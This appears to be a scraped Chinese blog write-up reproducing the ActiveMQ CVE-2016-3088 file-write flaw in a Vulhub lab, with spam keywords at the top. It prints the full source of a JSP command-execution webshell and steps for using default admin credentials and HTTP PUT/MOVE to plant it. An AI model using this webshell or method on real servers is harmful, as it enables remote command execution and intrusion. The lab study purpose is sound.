国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CVE-2016-3088漏洞復現(xiàn)

這篇具有很好參考價值的文章主要介紹了CVE-2016-3088漏洞復現(xiàn)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

1.背景介紹。

ActiveMQ的web控制臺分三個應用,admin、api和fileserver,其中admin是管理員頁面,api是接口,fileserver是儲存文件的接口;admin和api都需要登錄后才能使用,fileserver無需登錄。

fileserver是一個RESTful API接口,我們可以通過GET、PUT、DELETE等HTTP請求對其中存儲的文件進行讀寫操作,其設計目的是為了彌補消息隊列操作不能傳輸、存儲二進制文件的缺陷,但后來發(fā)現(xiàn):

  1. 其使用率并不高
  2. 文件操作容易出現(xiàn)漏洞

所以,ActiveMQ在5.12.x~5.13.x版本中,已經(jīng)默認關(guān)閉了fileserver這個應用(你可以在conf/jetty.xml中開啟之);在5.14.0版本以后,徹底刪除了fileserver應用。

在測試過程中,可以關(guān)注ActiveMQ的版本,避免走彎路。

2.環(huán)境介紹。

采用kali搭建Vulhub靶場。

靶機:127.0.0.1

環(huán)境監(jiān)聽61616端口和8161端口,其中8161為web控制臺端口,本漏洞就出現(xiàn)在web控制臺中。

訪問http://172.18.0.1:8161/看到web頁面,說明環(huán)境已成功運行。

3.漏洞復現(xiàn)。

本漏洞出現(xiàn)在fileserver應用中,漏洞原理其實非常簡單,就是fileserver支持寫入文件(但不解析jsp),同時支持移動文件(MOVE請求)。所以,我們只需要寫入一個文件,然后使用MOVE請求將其移動到任意位置,造成任意文件寫入漏洞。

文件寫入有幾種利用方法:

  1. 寫入webshell
  2. 寫入cron或ssh key等文件
  3. 寫入jar或jetty.xml等庫和配置文件

寫入webshell的好處是,門檻低更方便,但前面也說了fileserver不解析jsp,admin和api兩個應用都需要登錄才能訪問,所以有點雞肋;寫入cron或ssh key,好處是直接反彈拿shell,也比較方便,缺點是需要root權(quán)限;寫入jar,稍微麻煩點(需要jar的后門),寫入xml配置文件,這個方法比較靠譜,但有個雞肋點是:我們需要知道activemq的絕對路徑。

分別說一下上述幾種利用方法。

(1)寫入webshell

我們首先要通過賬號密碼登錄

賬號:admin
密碼:admin

之后訪問http://127.0.0.1:8161/admin/test/systemProperties.jsp來獲取真實路徑

CVE-2016-3088漏洞復現(xiàn)

進入/fileserver/目錄,抓包寫入webshell

CVE-2016-3088漏洞復現(xiàn)

<%
// 如果請求參數(shù)pwd的值為"023"
if("023".equals(request.getParameter("pwd"))){
    // 獲取執(zhí)行命令的參數(shù)i
    String cmd = request.getParameter("i");
    // 執(zhí)行命令并獲取子進程的輸入流
    java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    // 輸出<pre>標簽
    out.print("<pre>");
    // 讀取子進程的輸出流并輸出
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    // 輸出</pre>標簽
    out.print("</pre>");
}
%>

注意這時我們雖然寫入文件,但我們?nèi)ピL問這個文件時會發(fā)現(xiàn).txt文件并沒有被解析

CVE-2016-3088漏洞復現(xiàn)

?所以我們還需要將這個文件去移動到一個有執(zhí)行jsp文件權(quán)限的目錄下,這時我們就用到了我們在之前查詢到的真實路徑,還是通過抓包來操作

CVE-2016-3088漏洞復現(xiàn)

?我們將webshell寫入api目錄下,進入/api/查看

CVE-2016-3088漏洞復現(xiàn)

?寫入成功,進入后根據(jù)小馬參數(shù)構(gòu)建命令即可

CVE-2016-3088漏洞復現(xiàn)

?除此之外,還有其他兩種方法利用,但筆者在復現(xiàn)過程中遇到問題較多,沒有進行下去,哪位大佬有成功浮現(xiàn)的,踢我一下。

?文章來源地址http://www.zghlxwxcb.cn/news/detail-425108.html

到了這里,關(guān)于CVE-2016-3088漏洞復現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務器費用

相關(guān)文章

  • vulnhub_phpmyadmin_CVE-2016-5734漏洞復現(xiàn)

    vulnhub_phpmyadmin_CVE-2016-5734漏洞復現(xiàn)

    漏洞簡介 phpMyAdmin是一套開源的、基于Web的MySQL數(shù)據(jù)庫管理工具。在其查找并替換字符串功能中,將用戶輸入的信息拼接進preg_replace函數(shù)第一個參數(shù)中。 在PHP5.4.7以前,preg_replace的第一個參數(shù)可以利用\\0進行截斷,并將正則模式修改為e。眾所周知,e模式的正則支持執(zhí)行代碼,

    2024年02月08日
    瀏覽(20)
  • ActiveMQ 任意文件上傳漏洞復現(xiàn)

    ActiveMQ 任意文件上傳漏洞復現(xiàn)

    ? 訪問 http://ip:8161/admin/ 進入admin登陸頁面,使用弱口令登陸,賬號密碼皆為 admin,登陸成功后,headers中會出現(xiàn)驗證信息 ? 如:? Authorization: Basic YWRtaW46YWRtaW4= ? 訪問任意頁面并抓包,注意headers中的驗證信息 ? 將GET協(xié)議修改為PUT協(xié)議,將文件上傳至 fileserver 目錄下 ? 如上

    2024年04月16日
    瀏覽(20)
  • Apache ActiveMQ RCE漏洞復現(xiàn)

    Apache ActiveMQ RCE漏洞復現(xiàn)

    1、 產(chǎn)品簡介 ActiveMQ是一種開源的基于JMS(Java Message Servie)規(guī)范的一種消息中間件的實現(xiàn),ActiveMQ的設計目標是提供標準的,面向消息的,能夠跨越多語言和多系統(tǒng)的應用集成消息通信中間件。ActiveMQ是Apache出品,最流行的,能力強勁的開源消息總線。 2、 漏洞概述 Apache Act

    2024年01月22日
    瀏覽(22)
  • ActiveMQ反序列化漏洞原理+復現(xiàn)

    ActiveMQ反序列化漏洞原理+復現(xiàn)

    ActiveMQ反序列化漏洞 ActiveMQ ActiveMQ是開源消息總線,消息中間件 工作原理 通過使用消息隊列,實現(xiàn)服務的異步處理,主要目的是減少請求響應時間和解耦合。 消息隊列,服務器A將客戶發(fā)起的請求放入服務器B的消息隊列中,服務器B從消息隊列中取出并處理。 從以上內(nèi)容中可

    2024年02月05日
    瀏覽(47)
  • nginx相關(guān)漏洞處理:CVE-2016-2183、CVE-2022-41741、CVE-2022-41742

    nginx相關(guān)漏洞處理:CVE-2016-2183、CVE-2022-41741、CVE-2022-41742

    提示:文章寫完后,目錄可以自動生成,如何生成可參考右邊的幫助文檔 漏掃發(fā)現(xiàn)機器上的nginx使用的openssl版本有點低,在加上nginx的部署時間較早,還是1.20.2版本的,一起進行升級。 SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)【原理掃描】 nginx 緩沖區(qū)錯誤漏洞(CVE-2022-41741) nginx 越

    2024年02月08日
    瀏覽(26)
  • 漏洞修復---SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)

    1.查看當前openssl版本 ? ? ? 我線上版本是?? OpenSSL 1.0.2k-fips?26?Jan?2017 ?官網(wǎng)下載最新版本 【當前我下載的版本為 openssl-1.1.1q】 2.將壓縮包上傳到linux服務器 ? ? tar -zxvf?openssl-1.1.1q.tar.gz 3.編譯安裝 4.?移除老版本openssl 5. 查看版本 openssl version 報錯? ? openssl: error while loadi

    2024年02月16日
    瀏覽(24)
  • 解決漏洞:SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)

    解決漏洞:SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)

    錯誤詳情: 解決方案 ?win2012R2解決辦法 參考鏈接:Browse code samples | Microsoft Learn 下載該ps1的文件。 下載該ps1的文件。 首先運行PowerShell后去文件夾中運行,或者直接輸入 D:Solve-Sweet32.ps1 即可 參考鏈接? SSL/TLS協(xié)議信息泄露漏洞(CVE-2016-2183)解決辦法(WindowsServer2012r2 3389端口 )

    2024年02月12日
    瀏覽(24)
  • Apache ActiveMQ RCE漏洞復現(xiàn)(CNVD-2023-69477)

    Apache ActiveMQ RCE漏洞復現(xiàn)(CNVD-2023-69477)

    ??ActiveMQ是一個開源的消息代理和集成模式服務器,它支持Java消息服務(JMS) API。它是Apache Software Foundation下的一個項目,用于實現(xiàn)消息中間件,幫助不同的應用程序或系統(tǒng)之間進行通信。 ?Apache ActiveMQ 中存在遠程代碼執(zhí)行漏洞,Apache ActiveMQ在默認安裝下開放了61616服務端口,

    2024年02月08日
    瀏覽(26)
  • windows修復SSL漏洞CVE-2016-2183(3389端口)

    windows修復SSL漏洞CVE-2016-2183(3389端口)

    刪除舊的,替換新的 old: new: 應用-確定 重啟服務器

    2024年02月11日
    瀏覽(24)
  • 記錄Windows Server CVE-2016-2183/CVE-2015-2808/CVE-2013-2566原理掃描漏洞修復

    記錄Windows Server CVE-2016-2183/CVE-2015-2808/CVE-2013-2566原理掃描漏洞修復

    *漏洞掃描出如下漏洞,針對標記的三個進行漏洞修復。 *關(guān)鍵:禁用3DES/RC4加密 1.Win+R運行:regedit,進入注冊表。 2.進入目錄:[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersSCHANNELCiphers 3.在Ciphers下新建5個項,分別對應如下,進行命名: RC4 40/128 、RC4 56/128、RC4 64/128、

    2024年02月13日
    瀏覽(19)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包